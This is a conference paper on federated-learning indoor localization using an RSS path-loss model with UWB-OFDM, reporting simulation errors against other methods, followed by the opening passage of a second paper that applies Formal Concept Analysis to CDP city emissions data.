1 Department of Electrical Engineering, Hassan II University, Casablanca, Morocco
{youssef.ibnatta,m.khaldoun,m.sadik}@ensem.ac.ma
2 NEST Research Group, ENSEM, Hassan II University, Casablanca, Morocco

Abstract. Nowadays, indoor positioning is an attractive topic because it puts at the customer's disposal several services that facilitate indoor life. However, indoor positioning systems suffer from multipath problems that reduce their quality. In this paper, we try to solve this problem through decentralization. We propose a new localization method based on federated learning and on the received signal strength (RSS) mathematical model using UWB-OFDM. The RSS mathematical model is used to build the offline RSSI database. Federated learning then uses this database to estimate position information by applying a neural network as a machine that relates signal strength to position coordinates. Our goal is to show how a decentralized method can limit the effect of the NLOS problem and also to demonstrate that the quality of federated learning strongly depends on the data. For this reason, we used four databases, one built by our approach and the others based on different technologies. In this paper, we used random data to evaluate the proposed method. In the simulation part, we use three platforms: MATLAB, MySQL, and a Java interface. The average error of the proposed approach is 148.9 cm in the case of 10 users with five repetition rounds.

Keywords: RSS · Federated learning · RMSE · UWB · OFDM · BLE · Wi-Fi

1 Introduction

With the increasing number of smartphone users, the demand for indoor localization tools is growing. Indoor localization systems facilitate people's lives indoors by providing navigation, guidance, and other services. This tool is a motivating research topic as it applies several available technologies, such as image processing, inertial sensor measurements, and radio bands, to detect users' steps. GPS is the most usable positioning tool outdoors; however, its signals are blocked by walls, which limits its use indoors. For this reason, researchers have decided to replace GPS with other effective indoor positioning tools. Indoor positioning systems are composed of three main parts:



– Physical positioning layer: is the hardware-software part that ensures the communication between the system elements. Then it prepares the positioning information for the algorithm, which estimates the client's position.
– The position estimation algorithm: is the software part of the system that consists of estimating the user's positions by using mathematical methods based on some parameters such as power, time, angle of deviation, phase variation, magnetic flux, etc. The algorithm can estimate the positions by calculating the variation of these parameters between the transmitter and the receiver.
– Optimization algorithm: this tool optimizes the basic algorithm by using deterministic or probabilistic mathematical methods and can reduce the error obtained by the basic algorithm.

Currently, indoor positioning algorithms are classified into six categories:

– Received Signal Strength (RSS) approaches based on Wi-Fi or Bluetooth
– Pedestrian Dead Reckoning (PDR) or Inertial Measurement Unit (IMU) approaches
– Triangulation and Trilateration-based approaches
– Tag/Reader identification approaches
– Localization by Vision
– Multimodal localization

The most usable localization infrastructures are the following:
– Wi-Fi
– UWB
– Bluetooth/NFC
– ZigBee
– Inertial sensors
– Camera
– RFID
– Laser sensor

The received signal strength (RSS) method is the most widely used algorithm; it uses the received signal strength values to derive the position information of the clients. This method is divided into two variants, the matrix method and the mathematical method (Friis equation). The first consists of forming a map of offline power fingerprints and then comparing the data of the matrix obtained online with the database formed offline (Fig. 1). This method is unable to estimate client positions with acceptable accuracy: it is not adapted to changing environments or to the heterogeneity of devices, it suffers from the multipath problem created by the non-direct visibility between the server and the client, from the instability of the measurements, etc. Fingerprinting uses either Wi-Fi or Bluetooth as a communication layer; Wi-Fi is more energy-intensive than Bluetooth. This method is easy to deploy and can be combined with other optimization algorithms such as machine learning algorithms. Some researchers have proposed to train the offline database automatically by using robots that measure the received signal strength values simultaneously (Fig. 1), thus


Fig. 1. Fingerprinting with and without site survey

updating the received signal strength database and making the system more adaptable to the changing environment. This tool is called SLAM. The mathematical received signal strength method is based on a telecommunication law that describes the factors influencing the sending and receiving of signals. This method is more efficient than the previous one because it does not require any power calibration, just the measurement of characteristic values such as loss, attenuation, etc. This fundamental tool links the received signal strength value to the distance, which facilitates position estimation. However, the multipath problem is a constraint that reduces the performance of all the approaches presented in the literature, which calls for other optimization algorithms that lead to systems better adapted to this type of constraint. Inertial sensors are also used to compute the step and the angle of deviation through the accelerometer, gyroscope, magnetometer, and pedometer, while the barometer is used to deduce floor changes. On the other hand, the triangulation and trilateration algorithms are simpler to deploy; some of them are based on the calculation of time delay, and others estimate the angle or phase deviation. For example, Time of Arrival (TOA) is a method that calculates the time of arrival of a signal transmitted by a base station. Time Difference of Arrival (TDOA) calculates the difference in time between at least two signals received by the client. Angle of Arrival (AOA) calculates the angle of arrival of a signal transmitted by an access point. Angle Difference of Arrival (ADOA) calculates the angle difference between at least two access points and the client. TOF is the time of flight of a signal from the source to the receiver: it calculates the internal time difference between the receiver and the transmitter of the source and then the external time difference between the source and the object. The quality of TOF is already demonstrated by robust systems on the positioning systems market, and this method performs better than TOA and TDOA. Vision-based localization is one of the most accurate, high-quality positioning approaches. However, this technique is too expensive in terms of energy consumption and requires powerful computers as well as high-quality cameras. This method remains limited to certain conditions of use due to


light effects. This technique builds a database of images or videos and then compares the data captured online with the offline data to estimate the user position. In recent years, the use of machine learning algorithms has increased due to their ability, through automatic learning, to predict results close to the true ones better than traditional filters. In general, machine learning algorithms fall into two categories, supervised learning and unsupervised learning, each containing several algorithms. The K-nearest neighbor (KNN) algorithm is the most widely used supervised learning algorithm in indoor positioning systems, capable of reducing the error of the basic method. There are also other types of learning such as federated learning (FL), reinforcement learning (RL), etc. In this paper, we propose a new indoor localization system based on federated learning (FL) with the mathematical method of received signal strength (RSS) using ultra-wideband (UWB) and orthogonal frequency division multiplexing (OFDM). These three tools can address the majority of indoor positioning constraints. The main contributions of this work are summarized as follows:
– FL-RSS-UWB-OFDM-based localization: In this paper, we propose a new positioning method based on the federated learning (FL) algorithm as a tool for optimizing the RSS-based algorithm. UWB-OFDM is used as a communication bridge between the different system elements. The major constraint of indoor positioning systems is the multipath problem, and the most effective solution is to decentralize the approach, which is why we used federated learning. The latter also decentralizes the system to ensure the protection of customer data.
– The simulation method: To evaluate the quality of our system, we used three platforms, MATLAB, MySQL, and a Java interface. MATLAB is used as the system processor, MySQL as the database, and the Java interface for system control. These three tools facilitate the evaluation of the approach and ensure the correct routing of the data between the algorithm steps.
– Improvement of the validation criteria of a positioning system: In our previous work, we assembled several criteria that determine the quality of indoor positioning systems. Our goal is to build a system that respects most of these criteria and to validate the proposed approach using true data; we also show how the system behaves in the case of erroneous data.
In the following, Sect. 2 describes the positioning method based on federated learning (FL) and the received signal strength (RSS) method. Section 3 presents the evaluation results of the approach. Section 4 shows the performance of the tools used. Finally, Sect. 5 presents the conclusion.

2 Indoor Localization Based on Federated Learning (FL) and the RSS Method

In this section, we present the positioning method based on federated learning (FL) with the RSS received signal strength mathematical model. The objective of using federated learning is to decentralize the proposed approach to reduce the negative impact of multipath on the basic algorithm. Our approach ensures direct visibility between


access points and clients, thus avoiding the multipath problem. We test the visibility by a distance threshold that verifies the non-blocking of transmitted signals. Figure 2 shows the proposed system architecture. We measure the initial distance by the following equations:

S(t) = A · cos(2π f0 t)                          (1)

Pr = (1/N) · Σ S(t)                              (2)

Pr = Pe + Ge + Gr − Aiso − PL                    (3)

Aiso = 20 log(d) + 20 log(f) + 32.44             (4)

PL(d) = PL0 + 10 γ log(d/d0) + S(d)              (5)

where S(t) is the transmitted signal, f0 is the transmitted signal frequency, Pr is the received signal strength, and Pe is the transmitted signal strength. Ge and Gr are respectively the gains of the transmitter and the receiver, Aiso is the attenuation, PL is the loss, PL0 is the loss at d equal to d0, γ is the path-loss slope, and S(d) is the shadowing attenuation. In the following, the system generates the initial model, which is composed of two machines as presented in Fig. 3. The received signal strength method is used to form the plane with power values, distances, and position information.
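A small numeric sketch of Eqs. (3)-(5) is given below. The antenna gains, path-loss exponent, and shadowing deviation are example values chosen only for illustration, and the 32.44 constant in Eq. (4) assumes the distance expressed in kilometres and the frequency in MHz; none of this reproduces the paper's exact simulation configuration.

```python
# Illustrative sketch of the RSS model in Eqs. (3)-(5); all numeric parameters
# are assumptions for the example, not the paper's exact configuration.
import numpy as np

def received_power(d, f_mhz, pe=20.0, ge=2.5, gr=2.5,
                   pl0=40.0, gamma=2.0, d0=1.0, sigma_shadow=2.0, rng=None):
    """Return the received power (dB) at distance d (metres)."""
    rng = rng or np.random.default_rng(0)
    # Eq. (4): free-space attenuation, with d in km and f in MHz (32.44 constant)
    aiso = 20 * np.log10(d / 1000.0) + 20 * np.log10(f_mhz) + 32.44
    # Eq. (5): log-distance path loss with log-normal shadowing S(d)
    pl = pl0 + 10 * gamma * np.log10(d / d0) + rng.normal(0.0, sigma_shadow)
    # Eq. (3): link budget
    return pe + ge + gr - aiso - pl

for d in (1.0, 2.0, 5.0):
    print(f"d = {d} m -> Pr = {received_power(d, f_mhz=3000.0):.2f} dB")
```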

Fig. 2. System Architecture

The first machine links the values of the powers generated in the site survey step with their suitable distances determined in the initial step. We use four access points, so each node is defined by a matrix of four RSSI values. The second machine links the distance values with the position coordinates of each node (machine 1–2).


Fig. 3. The two model machines

After the generation of the internal laws of the two machines, the server sends the initial model to the users, which check the line-of-sight condition. After that, each user calculates the received signal strength Pr and uses the initial model to estimate the position coordinates with the following equations:

Output1 = Pr · w11 + b11                         (6)

distance = Output1 · w21 + b21                   (7)

Output2 = distance · w12 + b12                   (8)

Position_info = Output2 · w22 + b22              (9)

Position_info = [Xe, Ye]                         (10)

In this paper, we have used federated learning based on the neural network (NN) algorithm. Afterward, the users expand the database by inserting power values, distances, and position coordinates into the server tables. The server generates the average model and sends it to the users through the access points. Then, as presented in the previous paragraphs, each client must connect to access points that satisfy the distance threshold; otherwise, the server does not send the initial model to that client. Figure 4 shows the federated localization, and Algorithm 1 shows the federated localization steps based on RSS and UWB-OFDM.
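The sketch below illustrates the two-machine estimation chain of Eqs. (6)-(10) and a simple server-side averaging step in the spirit of federated learning; the weight shapes and the plain element-wise mean aggregation are our simplifications for the example, not the exact model trained in the paper.

```python
# Illustrative sketch: two-machine estimation chain of Eqs. (6)-(10) plus a
# FedAvg-style averaging of client models. Shapes and the mean aggregation
# are assumptions made only for this example.
import numpy as np

def estimate_position(rssi, machine1, machine2):
    """Machine 1: RSSI -> distances (Eqs. 6-7); machine 2: distances -> [Xe, Ye] (Eqs. 8-10)."""
    w11, b11, w21, b21 = machine1
    w12, b12, w22, b22 = machine2
    out1 = rssi @ w11 + b11        # Eq. (6)
    dist = out1 @ w21 + b21        # Eq. (7): one distance per access point
    out2 = dist @ w12 + b12        # Eq. (8)
    return out2 @ w22 + b22        # Eqs. (9)-(10): estimated position [Xe, Ye]

def federated_average(client_models):
    """Server step: average each parameter across the clients' local models."""
    return [np.mean(params, axis=0) for params in zip(*client_models)]

rng = np.random.default_rng(0)
m1 = (rng.normal(size=(4, 8)), np.zeros(8), rng.normal(size=(8, 4)), np.zeros(4))
m2 = (rng.normal(size=(4, 8)), np.zeros(8), rng.normal(size=(8, 2)), np.zeros(2))
rssi = np.array([-60.0, -55.0, -70.0, -65.0])   # one reading per access point
print("estimated [Xe, Ye]:", estimate_position(rssi, m1, m2))

avg_m1 = federated_average([m1, m1])            # averaging two clients' copies
```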


Fig. 4. The federated tracking


3 Evaluation of Results

3.1 System Parameters

In this section, we present the simulation parameters summarized in Table 1.

Table 1. System parameters

Nu                         10/30/50
F0                         3×10^9 Hz
M                          4
NS                         256
Gr and Ge                  2.5 dB
Pe                         20 dB
Thd                        300 cm
Fs                         12×10^9 Hz
Size of area               5 m × 2 m
Number of hidden layers    10

Fig. 5. The UWB signal with and after OFDM modulation

We evaluate the approach by the root mean square error (RMSE), defined by the following equation:

RMSE = √((xe − xr)² + (ye − yr)²)                (11)

where xr, yr and xe, ye are the reference and estimated position coordinates, respectively.

3.2 Simulation Setup

In this section, we present the simulation that evaluates the performance of the proposed approach. In the simulation part, we used the following three tools:
MATLAB: used to run the processes of the system.
MySQL: used as the database of the system.
Eclipse (Java): the system's control interface, used to feed the system with random data and to visualize the results.


Fig. 6. The system control interface

Then, the control interface (shown in Fig. 6) populates the database with random user and access point (AP) information, such as identifiers, reference position coordinates, and algorithm parameters. Once the application completes the initialization step, MATLAB puts the federated localization algorithm into operation to estimate the user positions and inserts the results into the system database. The next step is to analyze the simulation results on the control interface, which takes the results available in the database and draws the results and curves of the different rounds. We have chosen several rounds because the random values do not always give the same results. We proposed a 5 m × 2 m simulation environment with four well-positioned static access points.

Fig. 7. The initial and post-turn squared error of the first machine

Figures 7 and 8 display the initial and post-turn squared error for the first and second machines. Table 2 shows the approach evaluation based on the number of rounds and RMSE for machines 1 and 2. Figure 9 shows the result of the proposed system simulation with one round for 10, 30, and three rounds for 50 users, respectively. Figure 10 displays the CDF in the cases of 10 users with five rounds, 30 users with two rounds, and 50


Fig. 8. The initial and post-turn squared error of the second machine

Table 2. The approach evaluation based on the number of rounds and RMSE for machines 1 and 2

Case                                  RMSE
Machine 1 (initialisation part)       2×10^−9
Machine 1 after training (1 round)    1×10^−10
Machine 2 (initialisation part)       15
Machine 2 after training (1 round)    13

Fig. 9. The result of the proposed system simulation with one round for 10, 30, and three rounds for 50 users

Fig. 10. The CDF in the cases of 10 users with 5 rounds, 30 users with 2 rounds and 50 users with 5 rounds


Table 3. Squared error in the case of 10 users with 5 rounds

10 users, 5 rounds   Round 1    Round 2   Round 3   Round 4   Round 5
RMSE                 162.5 cm   140 cm    182 cm    110 cm    150 cm

Table 4. Squared error in the case of 30 users with two rounds

30 users, 2 rounds   Round 1    Round 2
RMSE                 162.5 cm   180 cm

Table 5. Squared error in the case of 50 users with five rounds

50 users, 5 rounds   Round 1   Round 2   Round 3   Round 4   Round 5
RMSE                 140 cm    150 cm    180 cm    150 cm    190 cm

users with five rounds. Tables 3, 4, and 5 present the root mean square error in the case of 10 users with five rounds, 30 users with two rounds, and 50 users with five rounds (Figs. 11, 12 and 13).

Table 6. Comparison of the proposed approach with other methods

Approach                                       AVG(RMSE)
Federated localization (10 users, 5 rounds)    148.9 cm
Fingerprint (RSS)                              > 500 cm
HAIL [4] (BPNN-RSS)                            870 cm
Walkie-Markie                                  1650 cm
RSS-KNN [11]                                   3740 cm

3.3 Discussion

In the previous section, we presented the simulation of federated localization. In this section, we evaluate our system on three levels. First, on the number of rounds between the initial model and the post-training model: Figs. 7, 8 and Table 2 show the ability of federated localization to improve the system quality round after round. The RMSE decreases from 2×10^−9 to 1×10^−10 for machine 1 and from 15 to 13 for machine 2. We can notice that the error of machine 2 is higher than that of machine 1; this is explained by the use of the RSS mathematical model, which links the received signal strength and the distance and thus facilitates the regression operation. On the other hand, the second machine uses the Euclidean distance equation that links


Fig. 11. The CDF in the case of 10 users with five rounds based on the BLE database

Fig. 12. The CDF for the case of 10 users with 5 rounds based on the Wi-Fi database

Fig. 13. The CDF in the case of 10 users with 5 rounds based on the ZigBee database


Table 7. Federated localization with different types of databases

Approach                  AVG(RMSE)
Our approach              148.9 cm
FL with Wi-Fi dataset     174.45 cm
FL with BLE dataset       158.17 cm
FL with ZigBee dataset    190 cm

the distance and the position coordinates by the following relation:

d² = (xAP − xuser)² + (yAP − yuser)²             (12)

where xuser, yuser are the user position coordinates, xAP, yAP are the access point position coordinates, and d is the distance between the user and the access point. For this reason, we have proposed to use two machines instead of a single one that would link the powers directly to the position coordinates. The weakness of our proposed method, and of approaches based on machine learning algorithms in general, is that their quality strongly depends on the data. This article considers the case of data that is not entirely good in order to show the strengths of the proposed approach: the error does not exceed 200 cm in bad cases despite the negative effect of the initialization data. What we can extract from Table 7 is that the type of data, whether Wi-Fi, Bluetooth Low Energy, or ZigBee based, can have an impact on the quality of the system, although the results remain close to each other. The average error of our approach after five rounds is 148.9 cm, and from Fig. 10 and Tables 3, 4, and 5 we can see that the error varies during the rounds within an acceptable range between 100 cm and 190 cm. At the second level, we tested the approach against the number of users. From Tables 3, 4 and 5, we can see that the RMSE is not much influenced by the number of users: for one round, the RMSE is 162.5 cm for both 10 and 30 users and 140 cm for 50 users, which is a crowdsourcing case. Therefore, the decentralized system can keep its quality despite the size of the population that creates the multipath phenomenon; federated localization limits signal blocking and maintains its quality despite the effect of poor data and in crowdsourcing cases. At the third level, we compare the proposed approach with other popular methods in the literature. Table 6 shows the quality of our proposed approach compared to the others: the RSS-KNN method [11] has an error of 3.74 m, HAIL [4] has an average error of 8.7 m, RSS fingerprint-based methods have an error of more than 5 m, and our approach has an average error of 1.49 m. In parallel to this work, we have proposed a new algorithm [14] that uses the notion of the mobile access point model (MAPM) instead of being limited to static access points that do not cover all indoor users well. We rely on crowdsourcing to provide direct visibility between users and the system: this algorithm uses clients as mobile access points, which reduces the need for a high number of static access points. This approach succeeds in most cases in eliminating the NLOS problem, and its quality is independent of the initialization data, unlike federated localization; further, MAPM is better adapted to environmental changes. The average MAPM error in the case of 30 users is 10.19 cm, with a detection rate of 86.66% for only one round.


4 Tools Performance

Our challenge is to develop a high-quality positioning system. A high-quality system respects the majority of the criteria presented in our work [12]. We recall the criteria for choosing a good localization system:
• Precision
• Energy consumption
• Cost
• Easy to deploy
• Stability
• Response time
• Adaptation to changes in the environment and the heterogeneity of devices
• Complexity

To achieve this goal, we have chosen the following tools:
– Federated learning (FL)
– The mathematical method of received signal strength (RSS)
– UWB-OFDM

The mathematical model of RSS received signal strength is used to build the offline database because of its linearity, which facilitates the regression operation. Federated learning is a decentralized positioning algorithm used to limit the multipath problem, reduce the switching time between users, ensure the security of users' data, and maintain the quality of the system in crowdsourcing cases; however, its quality is strongly

Fig. 14. The qualities of the three proposed tools


dependent on the initial data. UWB-OFDM is a telecommunication and modulation tool that brings many benefits to the system, in particular a high frequency band, no interference between signals, low cost, low power consumption, and low complexity [13]. Figure 14 summarizes the qualities of the three tools used.

5 Conclusion

In this paper, we have presented a new indoor localization system under the name of federated localization. The objective was to meet the majority of the criteria for obtaining a good indoor positioning system. The major constraint of indoor localization systems is the multipath problem; therefore, we have tried to decentralize the system to limit this problem as much as possible. For these reasons, we have used three tools capable of meeting the above criteria: federated learning, the RSS received signal strength mathematical model, and UWB-OFDM. We used the RSS mathematical model to build the database; then the federated-learning-based neural network (NN) estimates the position information. We simulated the approach with three platforms, MATLAB, MySQL, and a Java interface, to facilitate the simulation step and ensure proper processing of the data. We evaluated the approach on three levels, the number of rounds and the number of users, and then we compared the approach with other methods. The quality of federated localization depends on the initial data, which may decrease the system performance. The average error of federated localization is 148.9 cm in the case of 10 users with 5 rounds, which is better than the other methods.

References 1. Khatab, Z.E., Hajihoseini, A., Ghorashi, S.A.: A finge print method for indoor localization using autoencoder based deep extreme learning machine. IEEE Sens. Lett. 2(1), 1–4 (2017) 2. Lim, S., Jung, J., Kim, S.-C., et al.: Deep neural network-based in-vehicle people localization using ultra-wideband radar. IEEE Access 8, 96606–96612 (2020) 3. Ciftler, B.S., Albaseer, A., Lasla, N., et al.: Federated learning for rss fingerprint-based localization: a privacy preserving crowdsourcing method. In: 2020 International Wireless Communications and Mobile Computing (IWCMC), pp. 2112–2117. IEEE (2020) 4. Dou, F., Lu, J., Xu, T., et al.: A bisection reinforcement learning approach to 3-D indoor localization. IEEE Internet Things J. 8(8), 6519–6535 (2020) 5. Xue, J., Liu, J., Sheng, M., et al.: A WiFi fingerprint based high-adaptability indoor localization via machine learning. China Commun. 17(7), 247–259 (2020) 6. Waadt, A.E., Wang, S., Kocks, C., et al.: Positioning in multiband OFDM UWB utilizing received signal strength. In: 2010 7th Workshop on Positioning, Navigation and Communication, pp. 308–312. IEEE (2010) 7. Achroufene, A., Amirat, Y., Chibani, A. : RSS-based indoor localization using belief function theory. IEEE Trans. Autom. Sci. Eng. 16(3), 1163–1180 (2018) 8. Shu, Y., Huang, Y., Zhang, J., et al.: Gradient-based fingerprinting for indoor localization and tracking. IEEE Trans. Ind. Electron. 63(4), 2424–2433 (2015) 9. Jang, B., Kim, H.: Indoor positioning technologies without offline fingerprinting map: a survey. IEEE Commun. Surv. Tutorials 21(1), 508–525 (2018) 10. Luo, C., Hong, H., Chan, M.C., et al.: MPiLoc: self-calibrating multi-floor indoor localization exploiting participatory sensing. IEEE Trans. Mob. Comput. 17(1), 141–154 (2017)


11. Chen, Q., Wang, B.: Finccm: fingerprint crowdsourcing, clustering and matching for indoor subarea localization. IEEE Wirel. Commun. Lett. 4(6), 677–680 (2015) 12. Ibnatta, Y., Khaldoun, M., Sadik, M.: Exposure and evaluation of different indoor localization systems. In: Proceedings of Sixth International Congress on Information and Communication Technology, pp. 731–742. Springer, Singapore (2022)https://doi.org/10.1007/978-98116-1781-2_64 13. Ibnatta, Y., Khaldoun, M., Sadik, M.: Indoor localization techniques based on UWB technology. In: Elbiaze, H., Sabir, E., Falcone, F., Sadik, M., Lasaulce, S., Ben Othman, J. (eds.) Ubiquitous Networking. UNet 2021. LNCS, vol. 12845. Springer, Cham (2021). https://doi. org/10.1007/978-3-030-86356-2_1 14. Ibnatta, Y., Khaldoun, M., Sadik, M.: Indoor localization system based on mobile access point model MAPM using RSS with UWB-OFDM. IEEE Access (2022)

Artificial Intelligence for Smart Decision-Making in the Cities of the Future

Youssef Mekki1(B), Chouaib Moujahdi2, Noureddine Assad1, and Aziz Dahbi1

1 National School of Applied Sciences, Chouaib Doukkali University, El Jadida, Morocco
[email protected], {assad.n,dahbi.a}@ucd.ac.ma
2 Scientific Institute, Mohammed V University in Rabat, Rabat, Morocco
[email protected]

Abstract. Global urbanization is growing at a rapid pace, and in the near future most of the world's population will move to cities. This trend will be extremely challenging for land use management, sustainable urban development, food supply, security and general human wellbeing. Thus, for several years, emerging technologies and new smart city concepts have been proposed to ensure optimal management of the cities of the future, namely artificial intelligence applications such as the Internet of Things (IoT), Machine Learning (ML) and Deep Learning (DL). In this context, we propose in this paper a methodology based on the use of the Formal Concept Analysis (FCA) method on qualitative data points obtained from the City Carbon Disclosure Project (CDP) database to generate Key Performance Indicators (KPIs) that can help and guide decision makers to reduce CO2 emissions and build efficient sustainable development strategies, especially for the cities of the future. We have focused our experimentation on 9 American cities. Our experimental results show that New York is the city that emits the most CO2 and that the emission sources are transportation, urban land use and energy demand in buildings.

Keywords: Smart Cities · Urban Sustainability · CDP Project · Formal Concept Analysis · Key Performance Indicators

1 Introduction

Today, more than half of the world's population lives in cities; by 2050, this rate will increase to nearly seven out of ten people. Indeed, cities contribute more than 70% of global carbon emissions and 60–80% of energy consumption. In addition to these environmental issues, rapid urbanization has created additional challenges, such as social inequalities, traffic congestion and water contamination, as well as associated health issues. There is currently a consensus that governments can use Information and Communication Technologies (ICTs), together with renewable energy and other


technologies, to build smarter and more sustainable cities. A smart and sustainable city is an innovative city that uses ICTs to improve the quality of life of its population and the efficiency of urban management and urban services, while respecting the economic, social, environmental and cultural needs of current and future generations [5,6]. The main objective of this paper is to show how we can use some artificial intelligence techniques to develop a methodology that can generate Key Performance Indicators (KPIs) related to the environmental and social issues of the cities of the future. We believe that such indicators can later be used to answer several critical questions like:
– How can we help cities of the future adapt rapidly to the changing climate in the midst of a global pandemic, but do so in a way that is socially equitable?
– In which projects can we invest to help cities emerge from a recession and alleviate climate problems, without generating or perpetuating racial/social inequalities?
We believe that answering such questions will greatly help to properly achieve the environmental sustainability goals of the cities of the future [3]. The rest of the paper is organized as follows. In Sect. 2, we present the proposed methodology and review all the tools used to build it: the FCA method, concept lattices and the data extraction environment. Our results and discussion are provided in Sect. 3. Finally, we conclude the paper in Sect. 4.

2 Proposed Methodology

The main four steps of the proposed methodology are as follows (see Fig. 1): 1) the analysis of the datasets to build the cross tables; 2) the conclusions of the first level using the association rules of the FCA function (e.g., Emissions Reduction Activities); 3) the extraction of the second level, where there are no definitive answers; 4) applying the FCA conceptual lattice to qualitative datasets to guide decision makers in their sustainable development strategy.

Fig. 1. The main steps of our proposed methodology.


To give an example of how we can generate the desired KPIs, we use in this paper the qualitative data provided in the written documents/texts/statements of the 2016 City Carbon Disclosure Project [1], which contains several datasets. In this context, five major datasets were chosen and examined for this work: 1) Anticipated economic opportunities, 2) Urban sustainability development incentives, 3) City emissions reduction activities, 4) Methodologies/guidelines for improving the environmental sustainability of the city and 5) Emission reduction targets. We have focused our study on 9 American cities (Los Angeles, Cleveland, Park City, UT, Pittsburgh, Austin, Chicago, San Francisco, New York City and Dallas) that were explored in more detail using the four-step process shown in Fig. 1. In the next subsections, we present the methods used in these four steps.

2.1 Formal Concept Analysis

Formal Concept Analysis (FCA) [4] focuses on studying concepts when they are formally described, in other words, when the context and the concepts are completely and precisely defined. It was proposed by Rudolf Wille in 1982 [7] as an application of lattice theory. In our work, the cross tables have been generated for the attributes and objects selected in each dataset. For example, referring back to Table 1, one of the association rules or implications generated by the Concept Explorer [2] is shown below:
< 1 out of 1 cities > Training = [100%] ⇒ < 1 > Monetary, Recognition
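As an illustration of how such implications can be derived from a cross table, here is a minimal Python sketch; the cities and attributes follow Table 1, but the cell values of this toy context are illustrative assumptions, not the actual CDP data.

```python
from itertools import combinations

# Toy binary context (cross table): which incentive attributes each city reports.
# The cell values here are illustrative assumptions, not the actual CDP data.
context = {
    "Cleveland":     {"Monetary", "Recognition", "Training"},
    "Park City, UT": {"Monetary", "Recognition"},
    "Pittsburgh":    {"Recognition", "Tools & Resources"},
}
attributes = set().union(*context.values())

def objects_with(attrs):
    """Objects (cities) possessing every attribute in attrs (FCA derivation)."""
    return {obj for obj, owned in context.items() if attrs <= owned}

# Single-premise implications A => B: every city that has A also has B.
for a, b in combinations(sorted(attributes), 2):
    for premise, conclusion in ((a, b), (b, a)):
        support = objects_with({premise})
        if support and support <= objects_with({conclusion}):
            print(f"< {len(support)} out of {len(support)} cities > {premise} => {conclusion}")
```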

Fig. 2. Anticipated Economic Opportunities - 9 Cities in the USA.


In a simple presentation such as the one shown in Table 2, the first-tier conclusions are easy to see:
< 4 out of 4 cities > Increased energy security ⇒ Development of new business industries (e.g. clean tech)

The generic form of an implication without any premise(s), or antecedent(s), is shown below:
{} ⇒ Conclusion(s)
The symbol {} means that the conclusion has an empty premise. This occurs when all objects, or the majority of objects, favor the same attribute listed in the cross table. For example, in Table 3 (column 2), we note the following association rule:
< 6 out of 6 cities > {} = [67%] ⇒ Recognition
Another example can be found in Fig. 2:
< 7 out of 7 cities > {} = [78%] ⇒ Increased infrastructure investment

Fig. 3. Types of Incentives - 9 Cities in the USA.

The proportion of objects leaning towards this particular implication is also 100%. If the association rules or implications result in a proportion of objects less than 100% (i.e., the consequence is only true for some objects), we consider them as special cases. Moreover, we examine cases where the number of objects is about half of the total number of objects in the crosstab. For example, in Table 3 (column 3):
< 6 out of 6 cities > Mass Transit = [86%] ⇒ Buildings, Energy Supply, Waste


2.2 Concept Lattices

The concept lattices are outlined on three levels. First, the basics of concept lattices are explained, starting from simple data contexts, which consist of a binary relation between objects and attributes indicating which object has which attribute. On the second level, conceptual relationships are discussed for data matrices which assign attribute values to each of the given objects. Finally, a mathematical model for conceptual knowledge systems is described. This model allows us to study mathematically the representation, inference, acquisition, and communication of conceptual knowledge [6]. For example, for the analysis referring to Table 1, we can start with a few basic questions:
– What is common for object 9 (i.e., New York City) and object 2 (i.e., Cleveland)?
– What is common for attribute 2 (i.e., Recognition) and attribute 5 (i.e., Tools and Resources)?
It turns out that the common attributes include Monetary (see, for example, Fig. 3). To answer the second question, we have to identify the object or objects that share both attributes. Only one object, "Chicago", has both attributes (see Fig. 3).
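The two questions above correspond to the FCA derivation operators (common attributes of a set of objects, and common objects of a set of attributes); a minimal sketch on a toy context whose cell values are illustrative assumptions:

```python
# Toy binary context; the cell values are illustrative assumptions, not the CDP cells.
context = {
    "Cleveland":     {"Monetary", "Recognition", "Training"},
    "Chicago (C40)": {"Recognition", "Tools & Resources"},
    "New York City": {"Monetary", "Recognition"},
}

def common_attributes(objects):
    """Attributes shared by all the given objects (first question)."""
    return set.intersection(*(context[o] for o in objects))

def common_objects(attrs):
    """Objects possessing all the given attributes (second question)."""
    return {o for o, owned in context.items() if attrs <= owned}

print(common_attributes({"New York City", "Cleveland"}))     # {'Monetary', 'Recognition'}
print(common_objects({"Recognition", "Tools & Resources"}))   # {'Chicago (C40)'}
```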

Fig. 4. Beneficiary of Incentive - 9 Cities in the USA.

Further, we note that the "Business" attribute is considered relevant by Chicago (C40) (see Fig. 4).

2.3 Data Extraction Environment

In this paper we extract data using the “Pandas” library which is a package that provides fast, flexible and expressive data structures that are designed to


make working with "relational" or "labeled" data easier and more intuitive. It aims to be the fundamental high-level building block for doing practical, real-world data analysis in Python. The overall process of the proposed methodology (see Fig. 1), including the data extraction, is as follows:
– Analyze the databases to process the large volumes of data in order to discover meaningful, useful and reusable "patterns". In our case we choose 9 cities in the United States.
– Apply the basic procedure of Formal Concept Analysis (FCA) based on a simple data representation (i.e., a binary array called a formal context). Each formal context is transformed into a mathematical structure called a concept lattice.
– Build the second level of conclusions. Through the use of FCA association rules, we extract the second-level definitive answers on sustainable urban development. At this level, we can also identify situations where there are no definitive answers on how to activate interventions/mechanisms to achieve a favorable outcome. The main objective here is to be able to convert the results of the first and second levels into actions.
– Extract the sources of CO2 emissions by domain to help policy makers improve sustainable development in their cities.
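A minimal sketch of this extraction step with Pandas; the file name and column names are illustrative assumptions rather than the actual CDP export schema:

```python
import pandas as pd

# Hypothetical export of a CDP dataset; file name and column names are illustrative.
df = pd.read_csv("cities_incentives_2015.csv")

# Keep the nine studied US cities and build a binary cross table (formal context):
# rows = cities, columns = incentive types, cells = 1 if the city reports the incentive.
cities = ["Los Angeles", "Cleveland", "Park City, UT", "Pittsburgh", "Austin",
          "Chicago", "San Francisco", "New York City", "Dallas"]
subset = df[df["City"].isin(cities)]
cross_table = (pd.crosstab(subset["City"], subset["Incentive type"]) > 0).astype(int)
print(cross_table)
```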

Fig. 5. Emissions Reduction Activities - 9 Cities in the USA.

We have used the following main CDP city datasets in this work:
1. Anticipated Economic Opportunity (Source: Carbon Disclosure Project (CDP) - Cities-2016 Anticipated Economic Opportunities): items such as operational efficiency, infrastructure investment, and development of new business (column G);
2. Types of Incentives (Source: Carbon Disclosure Project (CDP) - Cities-Incentives-to-Reduce-GHG-Emissions-2015): indicators such as monetary and recognition (column H);
3. Emissions Reduction Activity (Source: Carbon Disclosure Project (CDP) - Cities-Emissions-Reduction-Activities-2016): sectors of activity such as transport, energy demand in buildings, water, and waste (column H);
